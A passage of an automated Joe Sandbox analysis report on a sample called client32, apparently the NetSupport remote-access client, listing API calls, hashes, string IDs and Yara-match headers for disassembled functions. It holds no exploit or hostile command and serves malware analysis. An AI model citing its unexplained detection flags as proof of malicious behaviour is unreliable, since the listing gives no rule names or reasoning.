                                                                                                                                        • Instruction ID: 9a04e7462a0c233d6aa00a9f75ff86f01e5b570722fc2c668020740a09607ade
                                                                                                                                        • Opcode Fuzzy Hash: f61f7d0d41705b2bddadd8ae6b2dcdd88e7011fcc8a5ddb51cb97dbc3cac1dc2
                                                                                                                                        • Instruction Fuzzy Hash: 18218C769041A99FDB30EF54C880AE8B3B4FB48385F5049BDEA98D7201D6719DC6CF00
                                                                                                                                        APIs
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F6107
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,?,?,?,?,?,?,?,?,-000397EB), ref: 688F6129
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,-000397EB,?,?,68903361), ref: 688F6168
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave__wcstoui64strtoxl
                                                                                                                                        • String ID: CONNECTION_ID
                                                                                                                                        • API String ID: 2450600163-332495620
                                                                                                                                        • Opcode ID: 2eb65a8e2d31aa7db00276e91a4df677d3533f3c606b9271d6059ac4206366a2
                                                                                                                                        • Instruction ID: b2195a96d0d97817af5fc529a72607fbd610fcddbacdf7f2c8681e0d19a098e5
                                                                                                                                        • Opcode Fuzzy Hash: 2eb65a8e2d31aa7db00276e91a4df677d3533f3c606b9271d6059ac4206366a2
                                                                                                                                        • Instruction Fuzzy Hash: 15112B7A9086107BEF3086E89C4071F37659F423D4F980935FA56D7603E771E98386A3
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 688F6C0F
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F6C2E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: *$InternetQueryOptionA
                                                                                                                                        • API String ID: 199729137-4161725205
                                                                                                                                        • Opcode ID: 1c04e192cfa0c7acc0d7923de3344ac43d8a1806ecd04ee26a8bbfa9b3a4d087
                                                                                                                                        • Instruction ID: 9c2e485770bdc1f8343c464cad60ccc56841a92918b06a87025da1406f10ae9c
                                                                                                                                        • Opcode Fuzzy Hash: 1c04e192cfa0c7acc0d7923de3344ac43d8a1806ecd04ee26a8bbfa9b3a4d087
                                                                                                                                        • Instruction Fuzzy Hash: F4215371904218DFCB70DF68D841A9DBBF4FB4A314F504659E956A7240D7746A41CF90
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strtok
                                                                                                                                        • String ID: ,;$..\ctl32\util.cpp
                                                                                                                                        • API String ID: 1675499619-1361470564
                                                                                                                                        • Opcode ID: ce93753942c859c59d7e501bea822f3ba273834b7b1ebd9389ea84338f4515ed
                                                                                                                                        • Instruction ID: 3a21d0ed89595bcd9ff1dbda4637a27748d6098ff4eb0d40b20cf0eb11d9c026
                                                                                                                                        • Opcode Fuzzy Hash: ce93753942c859c59d7e501bea822f3ba273834b7b1ebd9389ea84338f4515ed
                                                                                                                                        • Instruction Fuzzy Hash: 770128B7B006473BD3011B7E6D40B9AF7AC8B81A58F184121FD58D7382EA21F909C2A6
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memsetwsprintf
                                                                                                                                        • String ID: %s_%d$Gateway_Name
                                                                                                                                        • API String ID: 1984265443-207007254
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FC36A
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: FLG=%d$ID=%d$UID=%s
                                                                                                                                        • API String ID: 3180605519-3107437138
                                                                                                                                        APIs
                                                                                                                                        • GetPropA.USER32(?,NSMCobrProxy), ref: 1105D150
                                                                                                                                        • DefWindowProcA.USER32(?,?,?,?), ref: 1105D168
                                                                                                                                        • DestroyWindow.USER32(?), ref: 1105D17C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$DestroyProcProp
                                                                                                                                        • String ID: NSMCobrProxy
                                                                                                                                        • API String ID: 3223085693-3894016192
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688F82B5
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688F82C5
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 68911975
                                                                                                                                          • Part of subcall function 68911960: __CxxThrowException@8.LIBCMT ref: 6891198A
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 6891199B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 1823113695-4289949731
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 1101D12F
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 1101D136
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                        • API String ID: 1319256379-1986719024
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM(?,00000000,?,?,?,?,688F9C3B,?,00000001), ref: 688F46DE
                                                                                                                                        • EnterCriticalSection.KERNEL32(00000008,?,?,?,688F9C3B,?,00000001), ref: 688F46EA
                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000008,?,688F9C3B,?,?,?,?,688F9C3B,?,00000001), ref: 688F47DF
                                                                                                                                        • Sleep.KERNEL32(?,?,?,?,688F9C3B), ref: 688F4814
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeaveSleepTimetime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3384934701-0
                                                                                                                                        APIs
                                                                                                                                        • __strdup.LIBCMT ref: 6890D6DC
                                                                                                                                        • _free.LIBCMT ref: 6890D7DE
                                                                                                                                          • Part of subcall function 6890BA20: __strdup.LIBCMT ref: 6890BA3A
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890D806
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890D81B
                                                                                                                                          • Part of subcall function 6890CE00: std::_Xinvalid_argument.LIBCPMT ref: 6890CE20
                                                                                                                                          • Part of subcall function 6890CE00: _memmove.LIBCMT ref: 6890CEA7
                                                                                                                                          • Part of subcall function 6890CE00: _memmove.LIBCMT ref: 6890CECB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __strdup_memmove$Exception@8ThrowXinvalid_argument_freestd::_std::exception::exception
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 837426990-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2782032738-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 689100D2
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 689100E7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68900BA3
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68900BB8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890F9F9
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890FA0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6892F34E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6892F363
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • std::exception::exception.LIBCMT ref: 11035277
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1103528C
                                                                                                                                        • std::exception::exception.LIBCMT ref: 1103529B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 110352B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 959338265-0
                                                                                                                                        • Opcode ID: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
                                                                                                                                        • Instruction ID: 4202d9b2a3b9504ee52c3147c78dbba3f188beb93750ea11af99058fe090304e
                                                                                                                                        • Opcode Fuzzy Hash: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
                                                                                                                                        • Instruction Fuzzy Hash: 14411BB5D00619AFCB10CF8AD880AAEFBF8FFA8604F10855FE555A7250E7716604CF91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 688FCCCD
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 688FCCE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1338273076-0
                                                                                                                                        • Opcode ID: 427c7448aa3db39fb9f784564281b19323c16e960dc8669fc7a55bb374806cee
                                                                                                                                        • Instruction ID: 4f77691604bb1e5ae98b9bc23f89811c3fce6bb7750a9fad78cbb809284f2f6f
                                                                                                                                        • Opcode Fuzzy Hash: 427c7448aa3db39fb9f784564281b19323c16e960dc8669fc7a55bb374806cee
                                                                                                                                        • Instruction Fuzzy Hash: A7314B749046189F8728DF59D9418ABB7F8FF98200B508AAED85A97721E730EE00CB91
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6892DFBA
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 6892DFED
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?), ref: 6892E01E
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?), ref: 6892E08C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: c5b4ae8bf8561fb33e7e6592538f19b5fe155b170cc6a5debbf5e11fecbfc0f0
                                                                                                                                        • Instruction ID: 1cd44ded93724c1faf7ab25e9b1448254b6025223d4022754a404f0ac7f877ed
                                                                                                                                        • Opcode Fuzzy Hash: c5b4ae8bf8561fb33e7e6592538f19b5fe155b170cc6a5debbf5e11fecbfc0f0
                                                                                                                                        • Instruction Fuzzy Hash: A9310330A28259EFDB10DFA4C8A49BE7BB9BF02328F5045A9E4718B299D731D941CB54
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5950: EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,?,?,688FD68F), ref: 688F596C
                                                                                                                                          • Part of subcall function 688F5950: LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,688FD68F), ref: 688F597D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688FD697
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FD6E3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: CMD=HANGUP$CONNECTION_ID=%u
                                                                                                                                        • API String ID: 3168844106-3609349715
                                                                                                                                        • Opcode ID: 4a66ebb213a48de3fa9f47469a81d5dbb8b85e004609fa8f23fad6bfd6502435
                                                                                                                                        • Instruction ID: d56aaef8390cfbbf58b1307e9ad20b743185dfef71565a0e7a5093c104f4dafa
                                                                                                                                        • Opcode Fuzzy Hash: 4a66ebb213a48de3fa9f47469a81d5dbb8b85e004609fa8f23fad6bfd6502435
                                                                                                                                        • Instruction Fuzzy Hash: F531A3B5900709AFCB20CFB8C840AAF7BF8EB48354F50892DE559D7601E735E645CBA2
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,?,?,688FD68F), ref: 688F596C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,688FD68F), ref: 688F597D
                                                                                                                                        • SetEvent.KERNEL32(00000318,?,?,?,?,?,688FD68F), ref: 688F59B7
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,688FD68F), ref: 688F59CC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3394196147-0
                                                                                                                                        • Opcode ID: 7c5607182e395ee0753fa87c7b412ff086a898c419b148aef2bc94c9eaed31f8
                                                                                                                                        • Instruction ID: bba707e0ece844df84aa16a911eeae52d139c7cee5c9080a080010a7c8de0cde
                                                                                                                                        • Opcode Fuzzy Hash: 7c5607182e395ee0753fa87c7b412ff086a898c419b148aef2bc94c9eaed31f8
                                                                                                                                        • Instruction Fuzzy Hash: 1E21BC30E086189FCF20DFA8C8047ADBBF0FB89304F4084AAD85AE7640E7319A05CB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11066020: SetEvent.KERNEL32 ref: 1106603B
                                                                                                                                          • Part of subcall function 11066020: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 1106606C
                                                                                                                                          • Part of subcall function 11066020: DispatchMessageA.USER32(?), ref: 11066076
                                                                                                                                          • Part of subcall function 11066020: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11066084
                                                                                                                                          • Part of subcall function 11065F00: _free.LIBCMT ref: 11065F2C
                                                                                                                                        • CloseHandle.KERNEL32(?,A0A8B03E,?,?,?,?,?,1117E678,000000FF), ref: 1106F17E
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,1117E678,000000FF), ref: 1106F18B
                                                                                                                                        • _free.LIBCMT ref: 1106F1C4
                                                                                                                                        • _free.LIBCMT ref: 1106F1D0
                                                                                                                                          • Part of subcall function 1110C580: CloseHandle.KERNEL32(?,023793D8,1110CD40,?,?,?,?,?,?,?,?,1118575B,000000FF), ref: 1110C59D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message_free$CloseHandlePeek$CriticalDeleteDispatchEventSection
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1300075904-0
                                                                                                                                        APIs
                                                                                                                                        • GetCommandLineA.KERNEL32 ref: 00401024
                                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00401079
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 0040109C
                                                                                                                                        • ExitProcess.KERNEL32 ref: 004010A9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4582948100.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2164999147-0
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688F68AE
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F68C3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: ERROR$RESULT
                                                                                                                                        • API String ID: 3168844106-833402571
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688F733E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F7353
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: ERROR$RESULT
                                                                                                                                        • API String ID: 3168844106-833402571
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688F73DE
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F73F9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: ERROR$RESULT
                                                                                                                                        • API String ID: 3168844106-833402571
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688F680E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F6823
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID: ERROR$RESULT
                                                                                                                                        • API String ID: 3168844106-833402571
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,00000000), ref: 688F7EB7
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,00000000), ref: 688F7ED0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
